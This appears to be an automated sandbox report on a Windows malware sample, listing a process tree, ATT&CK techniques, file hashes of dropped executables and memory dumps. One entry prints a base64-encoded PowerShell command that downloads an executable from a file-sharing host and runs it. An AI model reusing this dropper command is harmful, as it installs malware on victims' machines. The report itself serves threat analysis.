PID:1080

C:\Windows\SysWOW64\cmd.exe
cmd /c Wzjokpltbfr.bat
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1236

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBLAGcAdwB1AGcAcgBmAG0AYQB1AGsAYgBjAGIAawBnAHUAbQB1AC4AZQB4AGUAIgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AdAByAGEAbgBzAGYAZQByAC4AcwBoAC8AZwBlAHQALwBpAGkANgBGAHEAYgAvAHcAbwByAGQALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:620

C:\Users\Admin\AppData\Roaming\Kgwugrfmaukbcbkgumu.exe
"C:\Users\Admin\AppData\Roaming\Kgwugrfmaukbcbkgumu.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1424

C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
5⤵
- Executes dropped EXE
PID:1060

C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
5⤵
- Executes dropped EXE
PID:1048

C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
5⤵
- Executes dropped EXE
PID:1392

C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
5⤵
- Executes dropped EXE
PID:1676

C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
5⤵
- Executes dropped EXE
PID:1920

C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
5⤵
- Executes dropped EXE
PID:1464

C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
5⤵
- Executes dropped EXE
PID:1572

C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
5⤵
- Executes dropped EXE
PID:1692

C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
5⤵
- Executes dropped EXE
PID:676

C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
5⤵
- Executes dropped EXE
PID:1016

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
C:\Users\Admin\AppData\Roaming\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
C:\Users\Admin\AppData\Roaming\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
C:\Users\Admin\Documents\Wzjokpltbfr.bat
MD5
29e9b22feef3c9266a3228072aff9cca

SHA1
a7632e340c2929ed5dace6c266250cebc3c13ab2

SHA256
04f1edaab7365adc160f7a50e9376ae3cfa717900765fad12fbd67c5fc767684

SHA512
775587f577aa0be54a33ecac0ded78d4780cfeca3973867f296c543f37f21008e353772c096d4e4992298a995868a4715197950976dde2b3f55339c6d8c49f82

Download Submit
\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
\Users\Admin\AppData\Roaming\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
memory/620-60-0x0000000002320000-0x0000000002321000-memory.dmp

Filesize
4KB

Download
memory/620-61-0x0000000002321000-0x0000000002322000-memory.dmp

Filesize
4KB

Download
memory/620-62-0x0000000002322000-0x0000000002324000-memory.dmp

Filesize
8KB

Download
memory/620-58-0x0000000000000000-mapping.dmp

Download
memory/620-59-0x0000000075FC1000-0x0000000075FC3000-memory.dmp

Filesize
8KB

Download
memory/1080-53-0x000000002F261000-0x000000002F264000-memory.dmp

Filesize
12KB

Download
memory/1080-55-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1080-54-0x00000000717B1000-0x00000000717B3000-memory.dmp

Filesize
8KB

Download
memory/1080-92-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1236-56-0x0000000000000000-mapping.dmp

Download
memory/1424-82-0x00000000022B0000-0x00000000022B1000-memory.dmp

Filesize
4KB

Download
memory/1424-64-0x0000000000000000-mapping.dmp

Download
memory/1424-69-0x0000000004890000-0x000000000495B000-memory.dmp

Filesize
812KB

Download
memory/1424-67-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

Filesize
4KB

Download
memory/1424-70-0x0000000000450000-0x0000000000462000-memory.dmp

Filesize
72KB

Download